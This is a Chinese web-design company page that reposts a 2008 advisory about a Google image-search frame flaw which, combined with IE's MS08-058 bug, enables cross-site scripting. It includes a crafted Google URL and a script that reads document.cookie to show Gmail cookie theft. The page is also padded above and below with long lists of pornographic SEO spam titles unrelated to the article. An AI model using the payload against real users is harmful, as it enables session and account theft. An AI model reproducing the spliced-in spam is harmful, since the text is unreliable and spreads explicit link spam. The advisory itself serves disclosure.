亚洲视频电影图片偷拍一区 I 亚洲精品一区久久久久久 I 日本一区二区三区四区在线视频 I 美女黄色软件 I av宅男在线影院 I 99免费在线观看视频 I 国产69久久精品成人 I 电影午夜精品一区二区三区 I 色视频在线观看免费 I 国产aaa精品 I 在线视频 福利一区 I 日本韩国福利视频 I 五月天婷婷综合 I av免费在线观看网站 I 国产精品1区2区 I 91久久精品国产91久久 I 色黄网站91 I 性色一区二区三区 I 五月天在线播放 I 欧洲激情一区二区 I 老司机av资源 I 美女黄色小视频 I 巨大荫蒂视频欧美大片 I 少妇视频观看 I 国产真实久久 I 色琪琪久久se色 I 日韩 国产 一区 I 久青草视频在线 I 高清国产一区二区 I 18日本福利在线 I 不要抬头在线观看 I 久久夜色撩人精品 I 最新中文字幕第一页

深一集團(tuán)40%的客戶來自外地,80%的業(yè)務(wù)來自搜索引擎和良好口碑!
微信 微信人工客服  |
微信人工客服
QQ在線溝通

新聞中心

全國(guó)業(yè)務(wù)咨詢請(qǐng)致電

0755-27612861

為您打響品牌第一炮
  • 在線QQ
  • 在線客服
  • 在線留言
跨站腳本漏洞,利用MS08-058攻擊Google
發(fā)布日期:2008-10-22   關(guān)鍵詞:觀蘭網(wǎng)站建設(shè)★觀蘭網(wǎng)頁(yè)設(shè)計(jì)◆觀瀾網(wǎng)站制作   已有 8252 人瀏覽
國(guó)內(nèi)安全組織80sec近日發(fā)現(xiàn),Google提供的圖片搜索服務(wù)存在安全問題,結(jié)合IE瀏覽器的MS08-058漏洞可以造成整站的跨站腳本漏洞,幾乎可以控制所有的Google服務(wù)和獲得目標(biāo)用戶的認(rèn)證信息。

漏洞說明:Google是全球最大的搜索引擎。同時(shí)Google擁有其他龐大的WEB應(yīng)用程序產(chǎn)品線,涉及EMAIL、BLOG、在線文檔、個(gè)人主頁(yè)、電子地圖、論壇、RSS等互聯(lián)網(wǎng)幾乎所有的應(yīng)用業(yè)務(wù)。80sec發(fā)現(xiàn)Google提供的圖片搜索服務(wù)存在安全問題,結(jié)合IE瀏覽器的MS08-058漏洞可以造成整站的跨站腳本漏洞,幾乎可以控制所有的Google服務(wù)和獲得目標(biāo)用戶的認(rèn)證信息。

漏洞站點(diǎn):http://www.google.com

漏洞解析:Google提供的圖片搜索服務(wù)存在網(wǎng)頁(yè)框架安全問題,惡意攻擊者可以指定網(wǎng)頁(yè)的內(nèi)嵌框架頁(yè)指向任意網(wǎng)頁(yè)。該服務(wù)提供的URL地址主域名可以更改成Google的其他業(yè)務(wù)的子域名,從而造成嚴(yán)重的釣魚網(wǎng)頁(yè)攻擊隱患。如下:黑客指定imgrefurl參數(shù)就可能構(gòu)造GMAIL相關(guān)服務(wù)的釣魚網(wǎng)頁(yè)。

http://mail.google.com/imgres?imgurl=80sec&imgrefurl=http://www.80sec.com&hl=com

該漏洞結(jié)合由80SEC團(tuán)隊(duì)成員發(fā)現(xiàn)的IE瀏覽器的MS08-058部分漏洞可以造成GOOGLE整站的跨站腳本XSS漏洞,linx在《利用IE 框架跨域》文檔分析了MS08-058涉及網(wǎng)頁(yè)框架安全問題,子框架網(wǎng)頁(yè)可以操作主框架的窗口句柄。這種類型的漏洞主要危害是不受IE瀏覽器同源策略的限制,可以跨域控制其他域的網(wǎng)頁(yè),影響所有的WEB應(yīng)用。微軟已經(jīng)在08年10月提供了MS08-058補(bǔ)丁修復(fù)了該漏洞。

測(cè)試代碼:

將Google的漏洞頁(yè)指向MS08-058漏洞攻擊頁(yè)

http://mail.google.com/imgres?imgurl=80sec&imgrefurl=http://www.80sec.com/MS08-058.htm&hl=com

MS08-058.htm內(nèi)容


<script>
setTimeout (
function(){
parent.location.href = new String("javascript:alert(document.cookie)");
}
,1500);
</script>

即可獲得GAMIL的Cookie信息

危害提醒:

黑客利用瀏覽器漏洞可以使這種類型的低風(fēng)險(xiǎn)Web安全漏洞擴(kuò)大成影響所有Web應(yīng)用的高風(fēng)險(xiǎn)安全問題,請(qǐng)各大網(wǎng)站及安全管理人員仔細(xì)分析評(píng)估MS08-058類型的Web安全問題。

注:本文來自深一集團(tuán)原創(chuàng)或轉(zhuǎn)截 http://www.qingdaojichang.cn/newslist_462_2.html 如需轉(zhuǎn)載,請(qǐng)注明出處!
0
深一網(wǎng)絡(luò)公司專注設(shè)計(jì)14年
全國(guó)網(wǎng)站建設(shè)
深一云服務(wù)器深一云服務(wù)器
高性能,高安全
網(wǎng)絡(luò)公司拒絕不當(dāng)利
崇尚野蠻生長(zhǎng)
500強(qiáng)企業(yè)網(wǎng)500強(qiáng)企業(yè)網(wǎng)
站建設(shè)供應(yīng)商
10000家客戶案例10000家客戶案
實(shí)力說服力
83位技術(shù)團(tuán)隊(duì)83位技術(shù)團(tuán)隊(duì)
服務(wù)高保障
深一只做有排名網(wǎng)站只做有排名
有價(jià)值的網(wǎng)站
200人服務(wù)團(tuán)隊(duì)200人服務(wù)團(tuán)隊(duì)
追求客戶滿意
主站蜘蛛池模板: 精品麻豆剧传媒av国产 | 人妻无二区码区三区免费 | 国产老熟女伦老熟妇视频 | 国产一级二级三级在线观看 | 欧美亚洲日本高清不卡 | 精品四虎国产在免费观看 | 2021久久天天躁狠狠躁夜夜 | 免费无码又爽又刺激高潮虎虎视频 | 国产成人毛片无码视频软件 | 亚洲国产色播av在线 | 男女裸交免费无遮挡全过程 | 久久国内精品自在自线观看 | 日韩av无码一区二区三区无码 | 欧美成人看片一区二三区图文 | 日本免费人成视频在线观看 | 国产在线精品一区二区不卡顿 | 免费观看又色又爽又湿的视频软件 | 精品国产一区二区三区免费 | 日韩高清在线视频 | 亚洲人成影院在线无码按摩店 | 亚洲a∨无码一区二区三区 亚洲a∨无码无在线观看 | 蜜臀av夜夜澡人人爽人人 | 亚洲中文字幕av每天更新 | 偷柏自拍亚洲综合在线 | 久久精品国产第一区二区三区 | 国产精品偷伦视频免费观看了 | 3d全彩无码啪啪本子全彩 | 91精品国产色综合久 | 中文精品久久久久国产不卡 | 2012中文字幕在线视频 | 精品久久久久久久久久久aⅴ | 久久亚洲中文字幕精品有坂深雪 | 成人无码精品免费视频在线观看 | 大香伊人久久精品一区二区 | 亚洲自偷自偷在线制服 | 亚洲线精品一区二区三八戒 | 免费久久99精品国产自在现 | 亚洲欧美不卡视频在线播放 | 国产精品无码专区第一页 | 国产成人无码一区二区三区 | 日本肉体裸交xxxxbbbb |